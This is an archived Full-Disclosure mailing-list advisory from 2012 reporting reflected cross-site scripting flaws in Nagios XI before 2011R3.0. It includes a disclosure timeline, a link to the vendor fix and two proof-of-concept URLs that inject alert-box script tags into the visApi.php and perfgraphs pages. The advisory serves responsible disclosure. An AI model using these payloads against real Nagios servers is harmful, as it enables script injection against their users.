[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] 0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] 0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0
From: 0a29 40 <0a2940@xxxxxxxxx>
Date: Thu, 14 Jun 2012 19:38:48 +0100

================
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Multiple reflected XSS vulnerabilities exist within Nagios XI < 2011R3.0

Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT

================
Timeline:
================

16 May 2012 - Reported to Nagios Enterprises
16 May 2012 - Acknowledged
16 May 2012 - Reported fixed
04 June 2012 - Nagios XI 2011R3.0 released
14 June 2012 - Public disclosure

================
Details:
================

Page: /includes/components/graphexplorer/visApi.php
POC: 
http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=</script><script>alert('0a29')</script>&opt=topalerts

Page: /nagiosxi/perfgraphs/index.php
POC: 
http://site/nagiosxi/perfgraphs/index.php?view='><script>alert('0a29')</script>&start=&end=&startdate=&enddate=

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Using second gpg keyring may be misleading?
Next by Date: [Full-disclosure] AST-2012-009: Skinny Channel Driver Remote Crash Vulnerability
Previous by thread: Re: [Full-disclosure] Using second gpg keyring may be misleading?
Next by thread: [Full-disclosure] AST-2012-009: Skinny Channel Driver Remote Crash Vulnerability
Index(es):
- Date
- Thread